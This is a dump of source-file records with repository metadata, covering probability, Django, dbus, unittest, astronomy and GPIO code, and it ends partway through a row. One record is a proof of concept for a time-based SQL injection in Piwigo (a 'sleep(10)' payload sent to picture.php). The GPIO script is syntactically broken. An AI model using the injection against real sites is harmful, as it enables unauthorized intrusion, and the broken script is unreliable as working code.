blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2dcd6f7f2a1f98bb39c8596f4e950498c9765ccd | 1fc234b59d2b0e1c49fcef5884a8136eb56ac04e | /discrete_probability/PDF.py | ed207d39b5c411a9c31f0e44b615759095c8b22c | [] | no_license | SrMouraSilva/RBMPedalboardBackup | 9a292460c7a0a3811e259ed3aa758ffbe204ab73 | 16438b942a965409a8c86c04e64c71f883b30ccf | refs/heads/master | 2020-04-03T00:25:13.165155 | 2018-10-26T21:51:48 | 2018-10-26T21:51:48 | 154,898,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | import pandas as pd
from typing import List, Tuple
class PDF(object):
    """Discrete probability distribution backed by an experiment table.

    ``experiment`` is a :class:`pandas.DataFrame` whose rows record observed
    outcomes; conditioning is delegated to :class:`ConditionalProbability`.
    """
    def __init__(self, experiment: pd.DataFrame):
        # Raw experiment data; kept as-is, never copied.
        self.experiment = experiment
    def __call__(self, variables: List[str]):
        # Marginal-probability query interface -- not implemented yet.
        pass
    def given(self, variables: List[str]) -> 'ConditionalProbability':
        """Condition the experiment on *variables* (P(. | variables))."""
        return ConditionalProbability(self.experiment, variables)
class ConditionalProbability(object):
    """Conditional probability table built from an experiment DataFrame."""
    def __init__(self, experiment, variables):
        # Aggregate the outcome weights per combination of the conditioning
        # variables, then normalise so each column sums to one.
        totals = experiment.groupby(variables).sum()
        self.conditional_experiment = totals / totals.sum()
    def __getitem__(self, item: Tuple):
        """
        :param item: Tuple of values ordered by the original variables?
        """
        # .loc resolves the (possibly multi-level) index built by groupby.
        return self.conditional_experiment.loc[item]
| [
"mateus.moura@hotmail.com"
] | mateus.moura@hotmail.com |
4a2f33e9c7714b45151c27e76348439b97ab0ee6 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0221.py | fa9e3d4a6263af231383358eac672a3a12741e48 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,058 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import re
import urllib
import urllib2
from time import time
from baseframe import BaseFrame
class MyPoc(BaseFrame):
    """Time-based SQL-injection check for Piwigo <= 2.7.1 (Beebeeto PoC).

    Sends ``rate=sleep(10)`` to functions_rate.inc.php and flags the target
    as vulnerable when the response is delayed by roughly ten seconds.
    """
    poc_info = {
        # PoC metadata
        'poc': {
            'id': 'poc-2014-0221',
            'name': 'Piwigo <= v2.7.1 /functions_rate.inc.php SQL注入漏洞 POC',
            'author': '雷锋',
            'create_date': '2014-12-28',
        },
        # Protocol information
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer4_protocol': ['tcp'],
        },
        # Vulnerability information
        'vul': {
            'app_name': 'Piwigo',
            'vul_version': ['<=2.7.1'],
            'type': 'SQL Injection',
            'tag': ['Piwigo漏洞', 'SQL注入漏洞', '/functions_rate.inc.php', 'php'],
            'desc': '''
                由于functions_rate.inc.php文件中的rate_picture函数没有对传入的$rate变量
                进行过滤,直接拼接到SQL中执行。
            ''',
            'references': ['http://www.freebuf.com/articles/web/55075.html',
                           ],
        },
    }
    @classmethod
    def verify(cls, args):
        # Inject a sleep(10) payload through the picture-rating endpoint.
        verify_url = '%s/picture.php?/3/category/1/&action=rate' % args['options']['target']
        data = {'rate':'sleep(10)'}
        req = urllib2.Request(verify_url)
        data = urllib.urlencode(data)
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
        # Time the round trip; a ~10 s delay means the payload executed.
        a = time();
        response = opener.open(req, data)
        b = time();
        # NOTE(review): this second Request object is never used.
        req = urllib2.Request(verify_url)
        if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
        c = b-a
        # 10..15 s window tolerates network latency on top of sleep(10).
        if c>=10 and c<=15:
            args['success'] = True
            args['poc_ret']['vul_url'] = verify_url
        return args
    # Exploitation is identical to verification for this time-based check.
    exploit = verify
# Command-line entry point: run the PoC and pretty-print the result dict.
if __name__ == '__main__':
    from pprint import pprint
    mp = MyPoc()
    pprint(mp.run())
"834430486@qq.com"
] | 834430486@qq.com |
2dcd570258938d11c114742776270d2967aa0ff3 | 2fd087fbc5faf43940153693823969df6c8ec665 | /pyc_decrypted/latest/dbus/_dbus.py | 0ba1f777f9f8cd555e63eb655b27250266421ba5 | [] | no_license | mickeystone/DropBoxLibrarySRC | ed132bbffda7f47df172056845e5f8f6c07fb5de | 2e4a151caa88b48653f31a22cb207fff851b75f8 | refs/heads/master | 2021-05-27T05:02:30.255399 | 2013-08-27T13:16:55 | 2013-08-27T13:16:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,739 | py | #Embedded file name: dbus/_dbus.py
from __future__ import generators
__all__ = ('Bus', 'SystemBus', 'SessionBus', 'StarterBus')
__docformat__ = 'reStructuredText'
import os
import sys
import weakref
from traceback import print_exc
from dbus.exceptions import DBusException
from _dbus_bindings import BUS_DAEMON_NAME, BUS_DAEMON_PATH, BUS_DAEMON_IFACE, UTF8String, validate_member_name, validate_interface_name, validate_bus_name, validate_object_path, BUS_SESSION, BUS_SYSTEM, BUS_STARTER, DBUS_START_REPLY_SUCCESS, DBUS_START_REPLY_ALREADY_RUNNING
from dbus.bus import BusConnection
from dbus.lowlevel import SignalMessage
# Python 2 threading shim: fall back to the no-op dummy_thread module on
# builds compiled without thread support.
try:
    import thread
except ImportError:
    import dummy_thread as thread
class Bus(BusConnection):
    """A connection to one of the well-known D-Bus buses.

    Instances are shared: constructing a Bus of a type that already has a
    shared instance returns that instance unless ``private=True``.
    """
    # Cache of shared (non-private) connections, keyed by bus type.
    _shared_instances = {}
    def __new__(cls, bus_type = BusConnection.TYPE_SESSION, private = False, mainloop = None):
        # Reuse the cached shared connection when one exists.
        if not private and bus_type in cls._shared_instances:
            return cls._shared_instances[bus_type]
        # Map the bus type to the concrete subclass to instantiate.
        if bus_type == BUS_SESSION:
            subclass = SessionBus
        elif bus_type == BUS_SYSTEM:
            subclass = SystemBus
        elif bus_type == BUS_STARTER:
            subclass = StarterBus
        else:
            raise ValueError('invalid bus_type %s' % bus_type)
        bus = BusConnection.__new__(subclass, bus_type, mainloop=mainloop)
        bus._bus_type = bus_type
        if not private:
            cls._shared_instances[bus_type] = bus
        return bus
    def close(self):
        # Drop this connection from the shared cache before closing, so a
        # later Bus() call creates a fresh connection.
        t = self._bus_type
        if self.__class__._shared_instances.get(t) is self:
            del self.__class__._shared_instances[t]
        super(Bus, self).close()
    def get_connection(self):
        """Return self (Bus *is* its own connection nowadays)."""
        return self
    _connection = property(get_connection, None, None, 'self._connection == self, for backwards\n        compatibility with earlier dbus-python versions\n        where Bus was not a subclass of Connection.')
    # Static factories for the three well-known buses.
    def get_session(private = False):
        return SessionBus(private=private)
    get_session = staticmethod(get_session)
    def get_system(private = False):
        return SystemBus(private=private)
    get_system = staticmethod(get_system)
    def get_starter(private = False):
        return StarterBus(private=private)
    get_starter = staticmethod(get_starter)
    def __repr__(self):
        if self._bus_type == BUS_SESSION:
            name = 'session'
        elif self._bus_type == BUS_SYSTEM:
            name = 'system'
        elif self._bus_type == BUS_STARTER:
            name = 'starter'
        else:
            name = 'unknown bus type'
        return '<%s.%s (%s) at %#x>' % (self.__class__.__module__,
         self.__class__.__name__,
         name,
         id(self))
    __str__ = __repr__
class SystemBus(Bus):
    """The system-wide message bus (shared unless ``private=True``)."""
    def __new__(cls, private = False, mainloop = None):
        return Bus.__new__(cls, Bus.TYPE_SYSTEM, mainloop=mainloop, private=private)
class SessionBus(Bus):
    """The per-login-session message bus (shared unless ``private=True``)."""
    def __new__(cls, private = False, mainloop = None):
        return Bus.__new__(cls, Bus.TYPE_SESSION, private=private, mainloop=mainloop)
class StarterBus(Bus):
    """The bus that started this process, when launched by D-Bus activation."""
    def __new__(cls, private = False, mainloop = None):
        return Bus.__new__(cls, Bus.TYPE_STARTER, private=private, mainloop=mainloop)
# Backwards-compatibility shim: expose the deprecated ``dbus_bindings``
# module lazily, unless the user opted out via the environment variable.
if 'DBUS_PYTHON_NO_DEPRECATED' not in os.environ:
    class _DBusBindingsEmulation:
        """Lazy stand-in that imports dbus.dbus_bindings on first attribute access."""
        def __str__(self):
            return '_DBusBindingsEmulation()'
        def __repr__(self):
            return '_DBusBindingsEmulation()'
        def __getattr__(self, attr):
            # Replace the module-level placeholder with the real module the
            # first time any attribute is requested.
            global dbus_bindings
            import dbus.dbus_bindings as m
            dbus_bindings = m
            return getattr(m, attr)
    dbus_bindings = _DBusBindingsEmulation()
"bizonix@me.com"
] | bizonix@me.com |
eae1d5aa871c197f2e4c2314be6a3595cea2021e | d3feeb1f109d4a0d8d5d78bc36f0a92a9daba62e | /apps/organization/migrations/0001_initial.py | 2ae98e4bdde8e2aa97d6ceb86fcfcf74458caac7 | [] | no_license | yhgnice/vbtools | fa93750b6239704d6274326a50c65db7ca202ad4 | 33d67c2a9c89faeaf5688a79680af6fc31555ff7 | refs/heads/master | 2021-01-21T11:15:46.230560 | 2017-03-01T10:18:49 | 2017-03-01T10:18:49 | 83,540,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,603 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-02-14 15:10
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated migration: CityDict, CourseOrg and Teacher tables.

    Generated by Django 1.9.8; verbose_name strings are escaped Chinese labels.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        # Lookup table of cities an organization can belong to.
        migrations.CreateModel(
            name='CityDict',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=20, verbose_name='\u57ce\u5e02\u540d\u79f0')),
                ('desc', models.TextField(max_length=200, verbose_name='\u57ce\u5e02\u63cf\u8ff0')),
                ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u6dfb\u52a0\u65f6\u95f4')),
            ],
            options={
                'verbose_name': '\u673a\u6784\u5730\u5740',
                'verbose_name_plural': '\u673a\u6784\u5730\u5740',
            },
        ),
        # Course organization, linked to its city.
        migrations.CreateModel(
            name='CourseOrg',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50, verbose_name='\u673a\u6784\u540d\u79f0')),
                ('desc', models.TextField(verbose_name='\u673a\u6784\u63cf\u8ff0')),
                ('click_num', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u6570')),
                ('fav_nums', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u6570')),
                ('image', models.ImageField(upload_to='org/%Y/%m', verbose_name='\u5c01\u9762\u56fe')),
                ('address', models.CharField(max_length=150, verbose_name='\u673a\u6784\u5730\u5740')),
                ('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.CityDict', verbose_name='\u6240\u5728\u57ce\u5e02')),
            ],
            options={
                'verbose_name': '\u673a\u6784\u5730\u5740',
                'verbose_name_plural': '\u673a\u6784\u5730\u5740',
            },
        ),
        # Teacher, linked to the organization they belong to.
        migrations.CreateModel(
            name='Teacher',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50, verbose_name='\u6559\u6388\u540d')),
                ('work_years', models.IntegerField(default=0, verbose_name='\u5de5\u4f5c\u5e74\u9650')),
                ('work_company', models.CharField(max_length=50, verbose_name='\u5c31\u804c\u516c\u53f8')),
                ('work_position', models.CharField(max_length=50, verbose_name='\u516c\u53f8\u804c\u52a1')),
                ('points', models.CharField(max_length=50, verbose_name='\u6559\u5b66\u7279\u70b9')),
                ('image', models.ImageField(default='', upload_to='teacher/%Y/%m', verbose_name='\u5934\u50cf')),
                ('fav_nums', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u4eba\u6570')),
                ('click_nums', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u91cf')),
                ('add_time', models.DateTimeField(default=datetime.datetime.now)),
                ('org', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.CourseOrg', verbose_name='\u6240\u5c5e\u673a\u6784')),
            ],
            options={
                'verbose_name': '\u6559\u5e08',
                'verbose_name_plural': '\u6559\u5e08',
            },
        ),
    ]
| [
"123"
] | 123 |
aa9b04df156993dc5bb435472b42859dfae95690 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sc_1717-364/sdB_sc_1717-364_coadd.py | 491849876ccdc3f9dc2eaa7e1310236b158e424d | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | from gPhoton.gMap import gMap
def main():
    """Run gPhoton gMap for sdB_sc_1717-364: 30 s NUV count movie plus coadd."""
    gmap_kwargs = dict(
        band="NUV",
        skypos=[260.238292, -36.497778],
        skyrange=[0.0333333333333, 0.0333333333333],
        stepsz=30.,
        cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_sc_1717-364/sdB_sc_1717-364_movie_count.fits",
        cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_sc_1717-364/sdB_sc_1717-364_count_coadd.fits",
        overwrite=True,
        verbose=3,
    )
    gMap(**gmap_kwargs)
# Script entry point.
if __name__ == "__main__":
    main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
de11a72a4bf1877037b75859b5e37148a9c335c4 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/unittest/test/test_runner.py | 11a734aea40efcb5ca625872f999c1ff368cef69 | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 7,971 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\stdlib\unittest\test\test_runner.py
import unittest
from cStringIO import StringIO
import pickle
from .support import LoggingResult, ResultWithNoStartTestRunStopTestRun
class TestCleanUp(unittest.TestCase):
    """Exercise TestCase.addCleanup/doCleanups ordering and error reporting."""
    def testCleanUp(self):
        # Cleanups registered with addCleanup run in LIFO order with the
        # positional/keyword arguments they were registered with.
        class TestableTest(unittest.TestCase):
            def testNothing(self):
                pass
        test = TestableTest('testNothing')
        self.assertEqual(test._cleanups, [])
        cleanups = []
        def cleanup1(*args, **kwargs):
            cleanups.append((1, args, kwargs))
        def cleanup2(*args, **kwargs):
            cleanups.append((2, args, kwargs))
        test.addCleanup(cleanup1, 1, 2, 3, four='hello', five='goodbye')
        test.addCleanup(cleanup2)
        self.assertEqual(test._cleanups, [(cleanup1, (1, 2, 3), dict(four='hello', five='goodbye')), (cleanup2, (), {})])
        result = test.doCleanups()
        self.assertTrue(result)
        self.assertEqual(cleanups, [(2, (), {}), (1, (1, 2, 3), dict(four='hello', five='goodbye'))])
    def testCleanUpWithErrors(self):
        # An exception in a cleanup is reported to the result via addError
        # and makes doCleanups() return False; later cleanups still run.
        class TestableTest(unittest.TestCase):
            def testNothing(self):
                pass
        class MockResult(object):
            errors = []
            def addError(self, test, exc_info):
                self.errors.append((test, exc_info))
        result = MockResult()
        test = TestableTest('testNothing')
        test._resultForDoCleanups = result
        exc1 = Exception('foo')
        exc2 = Exception('bar')
        def cleanup1():
            raise exc1
        def cleanup2():
            raise exc2
        test.addCleanup(cleanup1)
        test.addCleanup(cleanup2)
        self.assertFalse(test.doCleanups())
        (test1, (Type1, instance1, _)), (test2, (Type2, instance2, _)) = reversed(MockResult.errors)
        self.assertEqual((test1, Type1, instance1), (test, Exception, exc1))
        self.assertEqual((test2, Type2, instance2), (test, Exception, exc2))
    def testCleanupInRun(self):
        # run() executes setUp/test/tearDown, then cleanups LIFO; when setUp
        # raises, only the cleanups run.
        blowUp = False
        ordering = []
        class TestableTest(unittest.TestCase):
            def setUp(self):
                ordering.append('setUp')
                if blowUp:
                    raise Exception('foo')
            def testNothing(self):
                ordering.append('test')
            def tearDown(self):
                ordering.append('tearDown')
        test = TestableTest('testNothing')
        def cleanup1():
            ordering.append('cleanup1')
        def cleanup2():
            ordering.append('cleanup2')
        test.addCleanup(cleanup1)
        test.addCleanup(cleanup2)
        def success(some_test):
            self.assertEqual(some_test, test)
            ordering.append('success')
        result = unittest.TestResult()
        result.addSuccess = success
        test.run(result)
        self.assertEqual(ordering, ['setUp',
         'test',
         'tearDown',
         'cleanup2',
         'cleanup1',
         'success'])
        blowUp = True
        ordering = []
        test = TestableTest('testNothing')
        test.addCleanup(cleanup1)
        test.run(result)
        self.assertEqual(ordering, ['setUp', 'cleanup1'])
    def testTestCaseDebugExecutesCleanups(self):
        # debug() also runs cleanups, including ones registered from within
        # another cleanup.
        ordering = []
        class TestableTest(unittest.TestCase):
            def setUp(self):
                ordering.append('setUp')
                self.addCleanup(cleanup1)
            def testNothing(self):
                ordering.append('test')
            def tearDown(self):
                ordering.append('tearDown')
        test = TestableTest('testNothing')
        def cleanup1():
            ordering.append('cleanup1')
            test.addCleanup(cleanup2)
        def cleanup2():
            ordering.append('cleanup2')
        test.debug()
        self.assertEqual(ordering, ['setUp',
         'test',
         'tearDown',
         'cleanup1',
         'cleanup2'])
class Test_TextTestRunner(unittest.TestCase):
    """Tests for unittest.TextTestRunner defaults, hooks and pickling."""
    def test_init(self):
        # Default construction: quiet-ish verbosity, no failfast/buffer.
        runner = unittest.TextTestRunner()
        self.assertFalse(runner.failfast)
        self.assertFalse(runner.buffer)
        self.assertEqual(runner.verbosity, 1)
        self.assertTrue(runner.descriptions)
        self.assertEqual(runner.resultclass, unittest.TextTestResult)
    def testBufferAndFailfast(self):
        # failfast/buffer flags are forwarded to the result object.
        class Test(unittest.TestCase):
            def testFoo(self):
                pass
        result = unittest.TestResult()
        runner = unittest.TextTestRunner(stream=StringIO(), failfast=True, buffer=True)
        runner._makeResult = lambda : result
        runner.run(Test('testFoo'))
        self.assertTrue(result.failfast)
        self.assertTrue(result.buffer)
    def testRunnerRegistersResult(self):
        # run() must register its result exactly once via registerResult;
        # the original hook is restored by a cleanup.
        class Test(unittest.TestCase):
            def testFoo(self):
                pass
        originalRegisterResult = unittest.runner.registerResult
        def cleanup():
            unittest.runner.registerResult = originalRegisterResult
        self.addCleanup(cleanup)
        result = unittest.TestResult()
        runner = unittest.TextTestRunner(stream=StringIO())
        runner._makeResult = lambda : result
        self.wasRegistered = 0
        def fakeRegisterResult(thisResult):
            self.wasRegistered += 1
            self.assertEqual(thisResult, result)
        unittest.runner.registerResult = fakeRegisterResult
        runner.run(unittest.TestSuite())
        self.assertEqual(self.wasRegistered, 1)
    def test_works_with_result_without_startTestRun_stopTestRun(self):
        # Legacy result classes lacking startTestRun/stopTestRun must still work.
        class OldTextResult(ResultWithNoStartTestRunStopTestRun):
            separator2 = ''
            def printErrors(self):
                pass
        class Runner(unittest.TextTestRunner):
            def __init__(self):
                super(Runner, self).__init__(StringIO())
            def _makeResult(self):
                return OldTextResult()
        runner = Runner()
        runner.run(unittest.TestSuite())
    def test_startTestRun_stopTestRun_called(self):
        # Modern results get startTestRun/stopTestRun exactly once each.
        class LoggingTextResult(LoggingResult):
            separator2 = ''
            def printErrors(self):
                pass
        class LoggingRunner(unittest.TextTestRunner):
            def __init__(self, events):
                super(LoggingRunner, self).__init__(StringIO())
                self._events = events
            def _makeResult(self):
                return LoggingTextResult(self._events)
        events = []
        runner = LoggingRunner(events)
        runner.run(unittest.TestSuite())
        expected = ['startTestRun', 'stopTestRun']
        self.assertEqual(events, expected)
    def test_pickle_unpickle(self):
        # A runner must survive a pickle round-trip at every protocol;
        # uses the pickleable (pure-Python) StringIO on purpose.
        from StringIO import StringIO as PickleableIO
        stream = PickleableIO('foo')
        runner = unittest.TextTestRunner(stream)
        for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
            s = pickle.dumps(runner, protocol=protocol)
            obj = pickle.loads(s)
            self.assertEqual(obj.stream.getvalue(), stream.getvalue())
    def test_resultclass(self):
        # A custom resultclass is stored and called with (stream,
        # descriptions, verbosity).
        def MockResultClass(*args):
            return args
        STREAM = object()
        DESCRIPTIONS = object()
        VERBOSITY = object()
        runner = unittest.TextTestRunner(STREAM, DESCRIPTIONS, VERBOSITY, resultclass=MockResultClass)
        self.assertEqual(runner.resultclass, MockResultClass)
        expectedresult = (runner.stream, DESCRIPTIONS, VERBOSITY)
        self.assertEqual(runner._makeResult(), expectedresult)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
ee3e365f9cb19991b8c30e535b0e2e0d8175ea01 | c87a4c8c40ba0711f57ba49461c84daf5707ca9b | /wscript | 79900d156591cbe0812a7379e08644b57187800d | [] | no_license | wwwqqqlll/fully-dynamic-betweenness-centrality | fdecc09b0e07eae1ab3cfeed21d86ec7bc673f3b | 0bb6422f704ad43e1a3d7a37a4b9b83df8f46689 | refs/heads/master | 2023-03-17T23:13:55.895071 | 2017-09-14T19:35:25 | 2017-09-14T19:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | #! /usr/bin/env python3
# waf project metadata: application name and version.
APPNAME= 'fully_dynamic_betweenness_centrality'
VERSION= '0.0.1'
# Source tree root and build output directory used by waf.
top = '.'
out = 'bin'
def options(opt):
    """Register the command-line option groups of the tools this build needs."""
    for tool in ('compiler_cxx', 'waf_unit_test'):
        opt.tool_options(tool)
def configure(conf):
    """Detect the C++ toolchain and record project-wide compile/link settings."""
    conf.load('compiler_cxx')
    conf.check_tool('compiler_cxx')
    # Warnings on, debug info, aggressive optimisation, C++11.
    cxx_flags = ['-Wall', '-Wextra', '-g', '-O3', '-std=c++11',
                 '-Wno-unused-local-typedefs']
    conf.env.append_value('CXXFLAGS', cxx_flags)
    # pthread is linked by every target that uses the 'common' uselib.
    conf.check_cxx(lib = ['pthread'], uselib_store = 'common')
def build(bld):
    """Descend into the library and program sub-build scripts."""
    for subdir in ('lib', 'src'):
        bld.recurse(subdir)
| [
"flowlight0@gmail.com"
] | flowlight0@gmail.com | |
0ac08c89716350174f18a687e1846eb2ed6ee541 | c8d3d66f7ae240f76c7ee95300939b32c6330352 | /python/grblio/tcpport.py | 2d35364e924728cc42407684e4642eb3db1b5a08 | [] | no_license | cnvogelg/cvmill | 6e07c1eaf86696e5cfd7056ff3a922757dd55ff3 | f97639491943aa98348118ccff5970f1ca170bde | refs/heads/master | 2021-01-10T21:45:48.169826 | 2015-10-17T18:04:03 | 2015-10-17T18:04:03 | 33,114,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,106 | py | #!/usr/bin/env python3
import socket
import select
import port
class TcpPort(port.Port):
    """Grbl host connection over TCP (e.g. a serial port bridged via socat)."""
    def __init__(self, hostname, hostport=5000, eol="\r\n"):
        port.Port.__init__(self, eol)
        # Endpoint only; the socket itself is created lazily in open().
        self.hostname = hostname
        self.hostport = hostport
    def open(self):
        """Create the TCP socket and connect with a 1 s timeout."""
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock = self._socket
        sock.settimeout(1)
        sock.connect((self.hostname, self.hostport))
    def close(self):
        """Shut down both directions, close the socket and forget it."""
        sock = self._socket
        sock.shutdown(socket.SHUT_RDWR)
        sock.close()
        self._socket = None
    def write(self, buf):
        """Send the whole of *buf* (str), UTF-8 encoded."""
        payload = buf.encode("utf-8")
        self._socket.sendall(payload)
    def _read_ready(self, timeout):
        """Return True when data becomes readable within *timeout* seconds."""
        readable, _, _ = select.select([self._socket.fileno()], [], [], timeout)
        return len(readable) > 0
    def _read(self):
        """Receive up to 1 KiB and decode it as UTF-8."""
        chunk = self._socket.recv(1024)
        return chunk.decode("utf-8")
# Manual smoke test: connect to the given host and run the shared PortTest.
if __name__ == '__main__':
    import sys
    import time
    if len(sys.argv) != 2:
        print("Usage:",sys.argv[0],"<host>")
        sys.exit(1)
    host = sys.argv[1]
    tp = TcpPort(host)
    t = port.PortTest(tp)
    t.run()
| [
"C.Vogelgsang@web.de"
] | C.Vogelgsang@web.de |
8a6f631e2e4a617c4bacc375bbcf0557a3e756ef | eb0711915d6bba2f765f052736e33ac9a9a397a6 | /HE1104/w_model_rms/glee_samp_1.0/samp57/glee_chain.py | aca54bcef4b6f487dfab6002bb9e7c866fddc7d5 | [] | no_license | dartoon/GL_HostGalaxy | cd2166f273ae7e0397a7d2d39f760ab59e86f014 | 7469f1c1e640d176a75cc6e9497920e494ad656a | refs/heads/master | 2016-08-11T13:27:17.545360 | 2016-04-07T19:04:57 | 2016-04-07T19:04:57 | 46,524,027 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | import numpy,subprocess
# Read the final 30 samples of the first parameter column from the GLEE
# MCMC chain file.  NOTE(review): the chain file name is hard-coded and
# should be changed to match the sample being processed.
with open('HE57.001.mcmc', 'r') as file1:
    para = numpy.loadtxt(file1)[-30:, 0]
# Chain index of the first retained sample; previously used to drive glee
# via subprocess (calls kept commented out in the original for reference):
#subprocess.call(["echo int(para[0])"],shell=True)
#subprocess.call(["glee -S ${i} HE57.001.001"],shell=True)
i = int(para[0])
# Write the integer chain numbers out, one per line.
# BUG FIX: the original ended with ``g.close`` (no parentheses), so the
# method was never called and the file was never explicitly flushed/closed;
# the ``with`` block guarantees both.
with open('chain_NO', 'w') as g:
    numpy.savetxt(g, para.astype(int), fmt='%i')
g.close
| [
"dingxuheng@mail.bnu.edu.cn"
] | dingxuheng@mail.bnu.edu.cn |
d0fe6e65861aad377033952b65f21df9a02bbe7a | 0fbc5cf8f4903e9e72d7a448a31bfbfe2f54821b | /Chapter12/12.8.py | 8c77f6075216e8a8a7b8dcdbf3fe11f0b3d4723d | [
"MIT"
] | permissive | PacktPublishing/Python-Robotics-Projects | a3a90e6698b0e486a5547ffb6211415c4a0e4f5a | 17221304cb3e15e486af855b442927f64fdcc738 | refs/heads/master | 2023-02-08T16:27:55.723634 | 2023-01-30T09:35:39 | 2023-01-30T09:35:39 | 134,238,783 | 24 | 16 | null | null | null | null | UTF-8 | Python | false | false | 747 | py | import RPi.GPIO as GPIO
import time

# Drive four GPIO output lines (S0..S3) through a fixed five-step pattern,
# advancing one step per second, forever.
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# BCM pin numbers of the four control lines.
S0 = 21
S1 = 22
S2 = 23
S3 = 24
# Configure all four lines as outputs.
# BUG FIX: the original never set up S3 and wrote to an undefined name
# ``S4``; S4 is assumed to be a typo for S3 -- TODO confirm against the
# wiring described in the chapter.
for _pin in (S0, S1, S2, S3):
    GPIO.setup(_pin, GPIO.OUT)

def _step(v0, v1, v2, v3):
    """Latch one output pattern onto S0..S3, then hold it for one second."""
    GPIO.output(S0, v0)
    GPIO.output(S1, v1)
    GPIO.output(S2, v2)
    GPIO.output(S3, v3)
    time.sleep(1)

# BUG FIX: ``While True:`` (capital W) was a syntax error, the loop body was
# not indented, and a stray quote plus a trailing ``}`` made the original
# file unparseable.  The five patterns below are the originals, in order.
while True:
    _step(1, 0, 1, 1)
    _step(1, 1, 1, 1)
    _step(1, 0, 0, 1)
    _step(0, 0, 0, 1)
    _step(0, 1, 0, 1)
"komalk@packtpub.com"
] | komalk@packtpub.com |
16d61e2dc2d30b2062edf9bf30d6c7d4a5763fb5 | 479696ed99f10e449308bf3379e8b3d167365ebe | /spa/forms.py | 04250e8ee2663c3fd252d14b6c8219b9ea99f35f | [
"BSD-2-Clause"
